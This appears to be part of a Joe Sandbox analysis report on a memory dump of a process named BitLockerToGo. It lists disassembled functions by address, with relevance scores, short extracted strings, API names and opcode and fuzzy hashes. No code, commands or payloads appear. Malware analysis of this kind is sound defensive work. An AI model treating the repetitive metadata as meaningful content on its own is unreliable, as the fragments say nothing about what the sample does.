                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $*W{$$*W{
                                                                                                                                                                                                              • API String ID: 0-3402859032
                                                                                                                                                                                                              • Opcode ID: e0e532e5eed10512a05d9f33e28991b7ab72ab192889a2371727cc8a6b9819e2
                                                                                                                                                                                                              • Instruction ID: b3fe1d90cb9c26ad1efe6a8261d78966e4932c76ce12017a8fd756a5f4e4757a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0e532e5eed10512a05d9f33e28991b7ab72ab192889a2371727cc8a6b9819e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51C12876604B408FC314DF38D8912A6BBF2FFD9304F19856DD5DA8B3A5E634A405CB46
                                                                                                                                                                                                              Function 00408EE0 Relevance: 2.8, Strings: 2, Instructions: 274COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 8${|
                                                                                                                                                                                                              • API String ID: 0-3202841668
                                                                                                                                                                                                              • Opcode ID: 3a4bf5a68616b208143da4ed44c08f0214b4fe7e5986b103ebe526cfbc1605f2
                                                                                                                                                                                                              • Instruction ID: f4279dad7fc729c772346c1dddf8315196a190289476fe21baff5b3aa9135ae8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a4bf5a68616b208143da4ed44c08f0214b4fe7e5986b103ebe526cfbc1605f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC71F57460C3828AD7158F65845037BFBE0AFA6344F14487EE4D1AB382D779C90AC76A
                                                                                                                                                                                                              Function 0041695C Relevance: 2.4, Strings: 1, Instructions: 1122COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: `
                                                                                                                                                                                                              • API String ID: 0-1305765250
                                                                                                                                                                                                              • Opcode ID: 895bdd23654af2fb364c17a96863134e6f6d8bac363d368a96ee22f748821227
                                                                                                                                                                                                              • Instruction ID: 38f18979144820d99dee7be26b945be2aac2fb028bfa52c60cecf0e4c905a6d9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 895bdd23654af2fb364c17a96863134e6f6d8bac363d368a96ee22f748821227
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D82F1715083118BC724CF24C8917ABB7F1EFC9714F19892DE8C99B360EB389991CB5A
                                                                                                                                                                                                              Function 0040F8A6 Relevance: 2.2, Strings: 1, Instructions: 989COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: +
                                                                                                                                                                                                              • API String ID: 0-2126386893
                                                                                                                                                                                                              • Opcode ID: a64b34fce99f051cdda37bd8dc09b4b96a909e6ab97d51a4b6ddcf059080cc53
                                                                                                                                                                                                              • Instruction ID: f9e47fcdc7dd1a288488f0cb1851d021d3a8dcab6bad8c8dbb85561ee67222a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a64b34fce99f051cdda37bd8dc09b4b96a909e6ab97d51a4b6ddcf059080cc53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D782F6B5A14B008FD714EF38C5813A7BBE1AF45314F148A3EE8AA873D1E778A545CB46
                                                                                                                                                                                                              Function 00413DC0 Relevance: 2.0, Strings: 1, Instructions: 735COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: D]+\
                                                                                                                                                                                                              • API String ID: 0-1174097187
                                                                                                                                                                                                              • Opcode ID: 99920237508a57bee3f7b9fb797ff301e56fd41b745c58b9ee7d0abd35740245
                                                                                                                                                                                                              • Instruction ID: ddae89e94fa7613d7035970ae1e98dcf5c7a0bdc30b84621de2eb000d4a5645c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99920237508a57bee3f7b9fb797ff301e56fd41b745c58b9ee7d0abd35740245
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 422221B9604200DBD3149F28EC42B6B73B1FF8A325F44062DF991872E1E7389D56C79A
                                                                                                                                                                                                              Function 0043A7E0 Relevance: 1.8, Strings: 1, Instructions: 518COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                              • API String ID: 2994545307-1993550816
                                                                                                                                                                                                              • Opcode ID: b5f96252524c328db2b3e4b0ccb71f686dc1aca6dd8f00f983b4eeac3d8302c9
                                                                                                                                                                                                              • Instruction ID: 8677803f5b7207b9331cf369e27e8e1d4aef0792b67f5df50bdee3370153d24d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5f96252524c328db2b3e4b0ccb71f686dc1aca6dd8f00f983b4eeac3d8302c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C12B1716483008FC324CF19C890A2BB7E2BF89724F159A2EE9E557391D735AD15CB8B
                                                                                                                                                                                                              Function 0041BE9F Relevance: 1.7, Strings: 1, Instructions: 487COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Subu
                                                                                                                                                                                                              • API String ID: 0-3714210173
                                                                                                                                                                                                              • Opcode ID: a0665cb699aaac200b281647bfda6ed39870c1ee095be1e80f08b263db44fa61
                                                                                                                                                                                                              • Instruction ID: 4d1556d5dabe764ea5d93671de273c0167a2ce56800b098de114dd600b9d70d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0665cb699aaac200b281647bfda6ed39870c1ee095be1e80f08b263db44fa61
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72D10472A583108BD7148F64CC413ABB3E2EFD5344F1AC52DE9C4AB394E6799941878A
                                                                                                                                                                                                              Function 0043D090 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: _Ve;
                                                                                                                                                                                                              • API String ID: 0-1939530796
                                                                                                                                                                                                              • Opcode ID: 6f0711ffefb6b9e6ef88812676b5a3e6c40b791f2a293509a016d1b6b7337fbc
                                                                                                                                                                                                              • Instruction ID: 3b85f0a38b19b5696cf2eb78a9cded777bf4d33cdc9bef41e924c03e673bc628
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f0711ffefb6b9e6ef88812676b5a3e6c40b791f2a293509a016d1b6b7337fbc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69F1F336A14210CFD308CF28E89065AB3E2FBCA314F1A897DD98997354DB39DC55CB85
                                                                                                                                                                                                              Function 00427100 Relevance: 1.7, Strings: 1, Instructions: 472COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: RuB
                                                                                                                                                                                                              • API String ID: 0-1524862659
                                                                                                                                                                                                              • Opcode ID: 13d3065cf8ce39c74fde21846a5ee6e5a48da03ebdc9ddc5ed20c783defba15a
                                                                                                                                                                                                              • Instruction ID: 62719fa0ebf5d16e81ef8d0d5fabe93f3ad5b8af322d947f49754a29f0e22078
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13d3065cf8ce39c74fde21846a5ee6e5a48da03ebdc9ddc5ed20c783defba15a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11E1E17260C3218BD314CF68D8517ABB3E1FFC5304F46892DE9999B390E7789905CB9A
                                                                                                                                                                                                              Function 004330EE Relevance: 1.7, APIs: 1, Instructions: 189COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2936123098-0
                                                                                                                                                                                                              • Opcode ID: cd1147a0fd4e65e800d773def7f2de9dd0ffddb6b4b92991d3245049d29392ef
                                                                                                                                                                                                              • Instruction ID: dfad21f5afe3abcc05f2451037bd241eb2e990617940d8abb69a7bd6536d9051
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd1147a0fd4e65e800d773def7f2de9dd0ffddb6b4b92991d3245049d29392ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C815DB5E002158FDB08DF68C9916AEBBF2BF8D300F258169D859AB350D7349D01CB95
                                                                                                                                                                                                              Function 0043D140 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: _Ve;
                                                                                                                                                                                                              • API String ID: 0-1939530796
                                                                                                                                                                                                              • Opcode ID: 837c66b50d2ae596e21dd87d4d97af93c60dfb4c85b4304c5505eb5a1693ee45
                                                                                                                                                                                                              • Instruction ID: 179fb81e209a9126aee668462e0e7eeea8eb11d06fecca632c20efe6f5e23dca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 837c66b50d2ae596e21dd87d4d97af93c60dfb4c85b4304c5505eb5a1693ee45
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E10536A14210CFD318CF28E89066AB3E2FFC9314F1A897DE89997354DB39DC558B85
                                                                                                                                                                                                              Function 0043D1D0 Relevance: 1.7, Strings: 1, Instructions: 434COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: _Ve;
                                                                                                                                                                                                              • API String ID: 0-1939530796
                                                                                                                                                                                                              • Opcode ID: 01b681acaaf8cfe9d95a95cf0a6eead1e27eefb0fd4692f0e69128d432eec5f9
                                                                                                                                                                                                              • Instruction ID: 330e403d0652c3068399858570d97d18b12cd48a1c18ec82e72964fe0d0ca427
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01b681acaaf8cfe9d95a95cf0a6eead1e27eefb0fd4692f0e69128d432eec5f9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DE11636B142108FD318CF29D89166BB3E2EFC9314F0A897DD899D7394DA39DC458B85
                                                                                                                                                                                                              Function 00414620 Relevance: 1.7, Strings: 1, Instructions: 405COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: *<
                                                                                                                                                                                                              • API String ID: 0-31302224
                                                                                                                                                                                                              • Opcode ID: d021d1e27a8b080e9ca32d5ac4b0c2fc9e27e53c751eb93a3315a99bcf08efee
                                                                                                                                                                                                              • Instruction ID: 975738940ea86278593d4b2db08cc52da99656c47fc2cfe6abed545f71517476
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d021d1e27a8b080e9ca32d5ac4b0c2fc9e27e53c751eb93a3315a99bcf08efee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D1F6B55093008BD721AF24D8517EBB3A4FFC6314F14452EE5C99B3A1EB389941CB5A
                                                                                                                                                                                                              Function 00438292 Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                              • API String ID: 0-336475711
                                                                                                                                                                                                              • Opcode ID: 6ef4858a509dc4cdf184841b975ef3ff71504944214386f4843698eac8c18c89
                                                                                                                                                                                                              • Instruction ID: 2f73f8a709d549562e3d7cf930d7ac737898b17613de950682556bef1c03a8d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ef4858a509dc4cdf184841b975ef3ff71504944214386f4843698eac8c18c89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08D1D37A618351CBCB189F24E85227BB3F1FF4A741F0B987DD841872A4EB3A8950D746
                                                                                                                                                                                                              Function 00429260 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                              • Opcode ID: cb17e7c1b373ae868c44e9598b488d8d6bc4fb0b8933aa7dad50c6f238b26d1a
                                                                                                                                                                                                              • Instruction ID: 94a86bae69f0cded1cd4c5f51765d04778e5bfeb54991f1d1b4d9956c4e80e3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb17e7c1b373ae868c44e9598b488d8d6bc4fb0b8933aa7dad50c6f238b26d1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31C14A72B083206BD714CE24E490B6BB7E9AF84314F58896FE89587381D73CDC45C796
                                                                                                                                                                                                              Function 004310AA Relevance: 1.6, APIs: 1, Instructions: 141memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2525500382-0
                                                                                                                                                                                                              • Opcode ID: eef166c5c5dfea6ab23290ede3330cb0984d3a47adec6e6c5c5b8f68a533f617
                                                                                                                                                                                                              • Instruction ID: ad1c33575bae2ed3009f960dfe5129d1648ce1fd3ab50d194c84beb6a775bd63
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eef166c5c5dfea6ab23290ede3330cb0984d3a47adec6e6c5c5b8f68a533f617
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E5195A2664B419BC314CF29C940451F3B2FF89320329A71CC5658FBB1E738F565D78A
                                                                                                                                                                                                              Function 004302E1 Relevance: 1.6, APIs: 1, Instructions: 132memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2525500382-0
                                                                                                                                                                                                              • Opcode ID: cd40e5180104e3fea352708efa22aa5445976ff024ae474a8b90d297d1b8eb05
                                                                                                                                                                                                              • Instruction ID: 1fe73e8abda640fc45fc8abb7656ea38db8a0305603315cc0b16c9cb29a464cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd40e5180104e3fea352708efa22aa5445976ff024ae474a8b90d297d1b8eb05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE5181B26A0B019BC314CF29C940456B3B2FF99310329AB1CC5698BFB1E738F565D789
                                                                                                                                                                                                              Function 0040CB05 Relevance: 1.6, Strings: 1, Instructions: 352COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: l
                                                                                                                                                                                                              • API String ID: 0-962745716
                                                                                                                                                                                                              • Opcode ID: 9e16378b57c435b3adfd03d972b0411f122b2d91f08cdd714cb790fe03796a48
                                                                                                                                                                                                              • Instruction ID: a729820b8e819a76a27f29a9a4287a7da9ba66fc493bdc63a1e6a8b259b003c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e16378b57c435b3adfd03d972b0411f122b2d91f08cdd714cb790fe03796a48
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78B11975214B01DFD318CF29C890B62BBE2FFA6310B14866DC4998BBA1D779F815CB84
                                                                                                                                                                                                              Function 004374D0 Relevance: 1.6, Strings: 1, Instructions: 350COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: vC
                                                                                                                                                                                                              • API String ID: 0-1371296168
                                                                                                                                                                                                              • Opcode ID: 4105dde6d64d899df630aa6fc63b597750c2bcd0d9dc4e6b55e01dc50c713722
                                                                                                                                                                                                              • Instruction ID: 6a6d0a71e1b84a727b213308c2c785541bafad44c80d4ad8f03617fbbb732a02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4105dde6d64d899df630aa6fc63b597750c2bcd0d9dc4e6b55e01dc50c713722
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25A155766083009BD328DF28CC9276BB7D2FB89314F15983DE9C997391DB799805CB86
                                                                                                                                                                                                              Function 0043DC10 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: m6i
                                                                                                                                                                                                              • API String ID: 2994545307-433365587
                                                                                                                                                                                                              • Opcode ID: 8bde33d7d81af4f78b099eaeba40ffaf7b1d1fb6752c7080faba678fe93ad405
                                                                                                                                                                                                              • Instruction ID: 2c2128ccbe77a5ce63f3182006c32708a20dcc8672a5bd55d4515132e68f9f4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bde33d7d81af4f78b099eaeba40ffaf7b1d1fb6752c7080faba678fe93ad405
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D913435A047118BD714DF18E850A6BB3E2FFDC710F16A42DE9888B364EB79AC51C785
                                                                                                                                                                                                              Function 00422F30 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: B4B
                                                                                                                                                                                                              • API String ID: 0-2946978807
                                                                                                                                                                                                              • Opcode ID: be586f6a036dd460c41b697459eb5122b12174c17e66ebc03f4b9dc89260c007
                                                                                                                                                                                                              • Instruction ID: 93deb56d5e0a48064e38cfb70b86653f6b10d7626219e1a5513b4a15b4d9da42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be586f6a036dd460c41b697459eb5122b12174c17e66ebc03f4b9dc89260c007
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2A101B16083159FD710CF68D8807AFF7E0FBC8344F01892DF999AB280D7B499498B86
                                                                                                                                                                                                              Function 0041C580 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: ~
                                                                                                                                                                                                              • API String ID: 0-1707062198
                                                                                                                                                                                                              • Opcode ID: 37ee67bda75a7dbd8089ec974ae9b1b12fc6fd802d9593f2840d077afb9ed359
                                                                                                                                                                                                              • Instruction ID: 623894f12c3e1cafc853d53a6c0bca52113d159c92967f89b04db2b7b94af6a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37ee67bda75a7dbd8089ec974ae9b1b12fc6fd802d9593f2840d077afb9ed359
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58812B729442614FC7128E288C903ABBBD1AB85324F19C27DDCB99B3C2D7788C46D7D1
                                                                                                                                                                                                              Function 00423290 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: B4B
                                                                                                                                                                                                              • API String ID: 0-2946978807
                                                                                                                                                                                                              • Opcode ID: 6cdb34c774402e49e4f6ace5e2708362c594fbf75a7442bf04e1c134fa01d3cc
                                                                                                                                                                                                              • Instruction ID: db7325596d52a72db0a66b40dabd6d40ff4049512e233b3c57ee9eeb7c74cf3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cdb34c774402e49e4f6ace5e2708362c594fbf75a7442bf04e1c134fa01d3cc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4A101B0E04318AFDB10DFA8D9857AEBBB4FB85304F10456DF698AB280D7744948CB96
                                                                                                                                                                                                              Function 00405ED0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: ,
                                                                                                                                                                                                              • API String ID: 0-3772416878
                                                                                                                                                                                                              • Opcode ID: d9dec9febcea7046455d8fb5a57df134163c7b989985a148f1426b4dc8793823
                                                                                                                                                                                                              • Instruction ID: 381d5142375ae06eb755a876d455664e370f8041fbfe0758d06cf5185896235e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9dec9febcea7046455d8fb5a57df134163c7b989985a148f1426b4dc8793823
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EB139711097819FD321DF28C88061BFBE0AFA9704F444A2DF5D997782D635E918CB67
